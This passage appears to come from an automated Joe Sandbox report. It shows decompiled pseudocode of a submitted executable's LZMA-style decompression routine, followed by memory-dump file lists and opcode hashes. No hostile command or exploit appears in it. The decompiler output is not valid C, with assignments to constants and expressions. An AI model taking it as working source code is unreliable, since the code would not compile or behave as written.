                    													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    													__eax =  *(__ebp - 0x58);
                    													__esi = __edi + __eax;
                    													 *(__ebp - 0x54) = __esi;
                    													__ax =  *__esi;
                    													__ecx = __ax & 0x0000ffff;
                    													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    													__eflags =  *(__ebp - 0xc) - __edx;
                    													if( *(__ebp - 0xc) >= __edx) {
                    														__ecx = 0;
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    														__ecx = 1;
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    														__ebx = 1;
                    														__ecx =  *(__ebp - 0x48);
                    														__ebx = 1 << __cl;
                    														__ecx = 1 << __cl;
                    														__ebx =  *(__ebp - 0x44);
                    														__ebx =  *(__ebp - 0x44) | __ecx;
                    														__cx = __ax;
                    														__cx = __ax >> 5;
                    														__eax = __eax - __ecx;
                    														__edi = __edi + 1;
                    														__eflags = __edi;
                    														 *(__ebp - 0x44) = __ebx;
                    														 *__esi = __ax;
                    														 *(__ebp - 0x50) = __edi;
                    													} else {
                    														 *(__ebp - 0x10) = __edx;
                    														0x800 = 0x800 - __ecx;
                    														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    														 *__esi = __dx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														L111:
                    														_t368 = __ebp - 0x48;
                    														 *_t368 =  *(__ebp - 0x48) + 1;
                    														__eflags =  *_t368;
                    														goto L112;
                    													} else {
                    														L117:
                    														goto L109;
                    													}
                    												}
                    												L103:
                    												__ecx =  *(__ebp - 0xc);
                    												__ebx = __ebx + __ebx;
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    													__ecx =  *(__ebp - 0x10);
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    													__ebx = __ebx | 0x00000001;
                    													__eflags = __ebx;
                    													 *(__ebp - 0x44) = __ebx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													L101:
                    													_t338 = __ebp - 0x48;
                    													 *_t338 =  *(__ebp - 0x48) - 1;
                    													__eflags =  *_t338;
                    													goto L102;
                    												} else {
                    													L106:
                    													goto L99;
                    												}
                    											}
                    											L96:
                    											__edx =  *(__ebp - 4);
                    											__eax = __eax - __ebx;
                    											 *(__ebp - 0x40) = __ecx;
                    											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    											goto L108;
                    										case 0x1a:
                    											L56:
                    											__eflags =  *(__ebp - 0x64);
                    											if( *(__ebp - 0x64) == 0) {
                    												L162:
                    												 *(__ebp - 0x88) = 0x1a;
                    												goto L170;
                    											}
                    											L57:
                    											__ecx =  *(__ebp - 0x68);
                    											__al =  *(__ebp - 0x5c);
                    											__edx =  *(__ebp - 8);
                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    											 *( *(__ebp - 0x68)) = __al;
                    											__ecx =  *(__ebp - 0x14);
                    											 *(__ecx +  *(__ebp - 8)) = __al;
                    											__eax = __ecx + 1;
                    											__edx = 0;
                    											_t192 = __eax %  *(__ebp - 0x74);
                    											__eax = __eax /  *(__ebp - 0x74);
                    											__edx = _t192;
                    											goto L80;
                    										case 0x1b:
                    											L76:
                    											__eflags =  *(__ebp - 0x64);
                    											if( *(__ebp - 0x64) == 0) {
                    												L163:
                    												 *(__ebp - 0x88) = 0x1b;
                    												goto L170;
                    											}
                    											L77:
                    											__eax =  *(__ebp - 0x14);
                    											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    											__eflags = __eax -  *(__ebp - 0x74);
                    											if(__eax >=  *(__ebp - 0x74)) {
                    												__eax = __eax +  *(__ebp - 0x74);
                    												__eflags = __eax;
                    											}
                    											__edx =  *(__ebp - 8);
                    											__cl =  *(__eax + __edx);
                    											__eax =  *(__ebp - 0x14);
                    											 *(__ebp - 0x5c) = __cl;
                    											 *(__eax + __edx) = __cl;
                    											__eax = __eax + 1;
                    											__edx = 0;
                    											_t275 = __eax %  *(__ebp - 0x74);
                    											__eax = __eax /  *(__ebp - 0x74);
                    											__edx = _t275;
                    											__eax =  *(__ebp - 0x68);
                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    											_t284 = __ebp - 0x64;
                    											 *_t284 =  *(__ebp - 0x64) - 1;
                    											__eflags =  *_t284;
                    											 *( *(__ebp - 0x68)) = __cl;
                    											L80:
                    											 *(__ebp - 0x14) = __edx;
                    											goto L81;
                    										case 0x1c:
                    											while(1) {
                    												L123:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													break;
                    												}
                    												L124:
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__edx =  *(__ebp - 8);
                    												__cl =  *(__eax + __edx);
                    												__eax =  *(__ebp - 0x14);
                    												 *(__ebp - 0x5c) = __cl;
                    												 *(__eax + __edx) = __cl;
                    												__eax = __eax + 1;
                    												__edx = 0;
                    												_t414 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t414;
                    												__eax =  *(__ebp - 0x68);
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    												__eflags =  *(__ebp - 0x30);
                    												 *( *(__ebp - 0x68)) = __cl;
                    												 *(__ebp - 0x14) = _t414;
                    												if( *(__ebp - 0x30) > 0) {
                    													continue;
                    												} else {
                    													L127:
                    													L81:
                    													 *(__ebp - 0x88) = 2;
                    													goto L1;
                    												}
                    											}
                    											L167:
                    											 *(__ebp - 0x88) = 0x1c;
                    											goto L170;
                    									}
                    								}
                    								L171:
                    								_t539 = _t538 | 0xffffffff;
                    								goto L172;
                    							}
                    						}
                    					}
                    				}
                    			}















                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x00407390
                    0x0040710d
                    0x0040710d
                    0x00000000
                    0x0040710d
                    0x0040738e
                    0x004075c3
                    0x004075c3
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x004075fa
                    0x004075fa
                    0x00000000
                    0x004075fa
                    0x00407447
                    0x004074c7
                    0x00407490

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                    • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                    • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                    • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 98%
                    			E00407395() {
                    				void _t533;
                    				signed int _t534;
                    				signed int _t535;
                    				signed int* _t605;
                    				void* _t612;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					if( *(_t612 - 0x40) != 0) {
                    						 *(_t612 - 0x84) = 0x13;
                    						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                    						goto L132;
                    					} else {
                    						__eax =  *(__ebp - 0x4c);
                    						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    						__ecx =  *(__ebp - 0x58);
                    						__eax =  *(__ebp - 0x4c) << 4;
                    						__eax =  *(__ebp - 0x58) + __eax + 4;
                    						L130:
                    						 *(__ebp - 0x58) = __eax;
                    						 *(__ebp - 0x40) = 3;
                    						L144:
                    						 *(__ebp - 0x7c) = 0x14;
                    						L145:
                    						__eax =  *(__ebp - 0x40);
                    						 *(__ebp - 0x50) = 1;
                    						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                    						L149:
                    						if( *(__ebp - 0x48) <= 0) {
                    							__ecx =  *(__ebp - 0x40);
                    							__ebx =  *(__ebp - 0x50);
                    							0 = 1;
                    							__eax = 1 << __cl;
                    							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                    							__eax =  *(__ebp - 0x7c);
                    							 *(__ebp - 0x44) = __ebx;
                    							while(1) {
                    								L140:
                    								 *(_t612 - 0x88) = _t533;
                    								while(1) {
                    									L1:
                    									_t534 =  *(_t612 - 0x88);
                    									if(_t534 > 0x1c) {
                    										break;
                    									}
                    									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                    										case 0:
                    											if( *(_t612 - 0x6c) == 0) {
                    												goto L170;
                    											}
                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                    											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                    											_t534 =  *( *(_t612 - 0x70));
                    											if(_t534 > 0xe1) {
                    												goto L171;
                    											}
                    											_t538 = _t534 & 0x000000ff;
                    											_push(0x2d);
                    											asm("cdq");
                    											_pop(_t569);
                    											_push(9);
                    											_pop(_t570);
                    											_t608 = _t538 / _t569;
                    											_t540 = _t538 % _t569 & 0x000000ff;
                    											asm("cdq");
                    											_t603 = _t540 % _t570 & 0x000000ff;
                    											 *(_t612 - 0x3c) = _t603;
                    											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                    											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                    											_t611 = (0x300 << _t603 + _t608) + 0x736;
                    											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                    												L10:
                    												if(_t611 == 0) {
                    													L12:
                    													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                    													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                    													goto L15;
                    												} else {
                    													goto L11;
                    												}
                    												do {
                    													L11:
                    													_t611 = _t611 - 1;
                    													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                    												} while (_t611 != 0);
                    												goto L12;
                    											}
                    											if( *(_t612 - 4) != 0) {
                    												GlobalFree( *(_t612 - 4));
                    											}
                    											_t534 = GlobalAlloc(0x40, 0x600); // executed
                    											 *(_t612 - 4) = _t534;
                    											if(_t534 == 0) {
                    												goto L171;
                    											} else {
                    												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                    												goto L10;
                    											}
                    										case 1:
                    											L13:
                    											__eflags =  *(_t612 - 0x6c);
                    											if( *(_t612 - 0x6c) == 0) {
                    												 *(_t612 - 0x88) = 1;
                    												goto L170;
                    											}
                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                    											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                    											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                    											_t45 = _t612 - 0x48;
                    											 *_t45 =  *(_t612 - 0x48) + 1;
                    											__eflags =  *_t45;
                    											L15:
                    											if( *(_t612 - 0x48) < 4) {
                    												goto L13;
                    											}
                    											_t546 =  *(_t612 - 0x40);
                    											if(_t546 ==  *(_t612 - 0x74)) {
                    												L20:
                    												 *(_t612 - 0x48) = 5;
                    												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                    												goto L23;
                    											}
                    											 *(_t612 - 0x74) = _t546;
                    											if( *(_t612 - 8) != 0) {
                    												GlobalFree( *(_t612 - 8));
                    											}
                    											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                    											 *(_t612 - 8) = _t534;
                    											if(_t534 == 0) {
                    												goto L171;
                    											} else {
                    												goto L20;
                    											}
                    										case 2:
                    											L24:
                    											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                    											 *(_t612 - 0x84) = 6;
                    											 *(_t612 - 0x4c) = _t553;
                    											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                    											goto L132;
                    										case 3:
                    											L21:
                    											__eflags =  *(_t612 - 0x6c);
                    											if( *(_t612 - 0x6c) == 0) {
                    												 *(_t612 - 0x88) = 3;
                    												goto L170;
                    											}
                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                    											_t67 = _t612 - 0x70;
                    											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                    											__eflags =  *_t67;
                    											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                    											L23:
                    											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                    											if( *(_t612 - 0x48) != 0) {
                    												goto L21;
                    											}
                    											goto L24;
                    										case 4:
                    											L133:
                    											_t531 =  *_t605;
                    											_t588 = _t531 & 0x0000ffff;
                    											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                    											if( *(_t612 - 0xc) >= _t564) {
                    												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                    												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                    												 *(_t612 - 0x40) = 1;
                    												_t532 = _t531 - (_t531 >> 5);
                    												__eflags = _t532;
                    												 *_t605 = _t532;
                    											} else {
                    												 *(_t612 - 0x10) = _t564;
                    												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                    												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                    											}
                    											if( *(_t612 - 0x10) >= 0x1000000) {
                    												goto L139;
                    											} else {
                    												goto L137;
                    											}
                    										case 5:
                    											L137:
                    											if( *(_t612 - 0x6c) == 0) {
                    												 *(_t612 - 0x88) = 5;
                    												goto L170;
                    											}
                    											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                    											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                    											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                    											L139:
                    											_t533 =  *(_t612 - 0x84);
                    											goto L140;
                    										case 6:
                    											__edx = 0;
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x34) = 1;
                    												 *(__ebp - 0x84) = 7;
                    												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                    												goto L132;
                    											}
                    											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    											__esi =  *(__ebp - 0x60);
                    											__cl = 8;
                    											__cl = 8 -  *(__ebp - 0x3c);
                    											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    											__ecx =  *(__ebp - 0x3c);
                    											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    											__ecx =  *(__ebp - 4);
                    											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    											__eflags =  *(__ebp - 0x38) - 4;
                    											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    											if( *(__ebp - 0x38) >= 4) {
                    												__eflags =  *(__ebp - 0x38) - 0xa;
                    												if( *(__ebp - 0x38) >= 0xa) {
                    													_t98 = __ebp - 0x38;
                    													 *_t98 =  *(__ebp - 0x38) - 6;
                    													__eflags =  *_t98;
                    												} else {
                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    												}
                    											} else {
                    												 *(__ebp - 0x38) = 0;
                    											}
                    											__eflags =  *(__ebp - 0x34) - __edx;
                    											if( *(__ebp - 0x34) == __edx) {
                    												__ebx = 0;
                    												__ebx = 1;
                    												goto L61;
                    											} else {
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__ecx =  *(__ebp - 8);
                    												__ebx = 0;
                    												__ebx = 1;
                    												__al =  *((intOrPtr*)(__eax + __ecx));
                    												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    												goto L41;
                    											}
                    										case 7:
                    											__eflags =  *(__ebp - 0x40) - 1;
                    											if( *(__ebp - 0x40) != 1) {
                    												__eax =  *(__ebp - 0x24);
                    												 *(__ebp - 0x80) = 0x16;
                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    												__eax =  *(__ebp - 0x28);
                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    												__eax =  *(__ebp - 0x2c);
                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    												__al = __al & 0x000000fd;
                    												__eax = (__eflags >= 0) - 1 + 0xa;
                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                    												__eax =  *(__ebp - 4);
                    												__eax =  *(__ebp - 4) + 0x664;
                    												__eflags = __eax;
                    												 *(__ebp - 0x58) = __eax;
                    												goto L69;
                    											}
                    											__eax =  *(__ebp - 4);
                    											__ecx =  *(__ebp - 0x38);
                    											 *(__ebp - 0x84) = 8;
                    											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                    											goto L132;
                    										case 8:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x84) = 0xa;
                    												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                    											} else {
                    												__eax =  *(__ebp - 0x38);
                    												__ecx =  *(__ebp - 4);
                    												__eax =  *(__ebp - 0x38) + 0xf;
                    												 *(__ebp - 0x84) = 9;
                    												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                    											}
                    											goto L132;
                    										case 9:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												goto L90;
                    											}
                    											__eflags =  *(__ebp - 0x60);
                    											if( *(__ebp - 0x60) == 0) {
                    												goto L171;
                    											}
                    											__eax = 0;
                    											__eflags =  *(__ebp - 0x38) - 7;
                    											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                    											__eflags = _t259;
                    											0 | _t259 = _t259 + _t259 + 9;
                    											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                    											goto L76;
                    										case 0xa:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x84) = 0xb;
                    												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                    												goto L132;
                    											}
                    											__eax =  *(__ebp - 0x28);
                    											goto L89;
                    										case 0xb:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__ecx =  *(__ebp - 0x24);
                    												__eax =  *(__ebp - 0x20);
                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    											} else {
                    												__eax =  *(__ebp - 0x24);
                    											}
                    											__ecx =  *(__ebp - 0x28);
                    											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    											L89:
                    											__ecx =  *(__ebp - 0x2c);
                    											 *(__ebp - 0x2c) = __eax;
                    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    											L90:
                    											__eax =  *(__ebp - 4);
                    											 *(__ebp - 0x80) = 0x15;
                    											__eax =  *(__ebp - 4) + 0xa68;
                    											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                    											goto L69;
                    										case 0xc:
                    											L100:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xc;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t335 = __ebp - 0x70;
                    											 *_t335 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t335;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											__eax =  *(__ebp - 0x2c);
                    											goto L102;
                    										case 0xd:
                    											L37:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xd;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t122 = __ebp - 0x70;
                    											 *_t122 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t122;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L39:
                    											__eax =  *(__ebp - 0x40);
                    											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    												goto L48;
                    											}
                    											__eflags = __ebx - 0x100;
                    											if(__ebx >= 0x100) {
                    												goto L54;
                    											}
                    											L41:
                    											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    											__ecx =  *(__ebp - 0x58);
                    											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    											 *(__ebp - 0x48) = __eax;
                    											__eax = __eax + 1;
                    											__eax = __eax << 8;
                    											__eax = __eax + __ebx;
                    											__esi =  *(__ebp - 0x58) + __eax * 2;
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    											__ax =  *__esi;
                    											 *(__ebp - 0x54) = __esi;
                    											__edx = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												 *(__ebp - 0x40) = 1;
                    												__cx = __ax >> 5;
                    												__eflags = __eax;
                    												__ebx = __ebx + __ebx + 1;
                    												 *__esi = __ax;
                    											} else {
                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edx;
                    												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    												__ebx = __ebx + __ebx;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											 *(__ebp - 0x44) = __ebx;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L39;
                    											} else {
                    												goto L37;
                    											}
                    										case 0xe:
                    											L46:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xe;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t156 = __ebp - 0x70;
                    											 *_t156 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t156;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											while(1) {
                    												L48:
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													break;
                    												}
                    												__eax =  *(__ebp - 0x58);
                    												__edx = __ebx + __ebx;
                    												__ecx =  *(__ebp - 0x10);
                    												__esi = __edx + __eax;
                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													_t170 = __edx + 1; // 0x1
                    													__ebx = _t170;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													continue;
                    												} else {
                    													goto L46;
                    												}
                    											}
                    											L54:
                    											_t173 = __ebp - 0x34;
                    											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                    											__eflags =  *_t173;
                    											goto L55;
                    										case 0xf:
                    											L58:
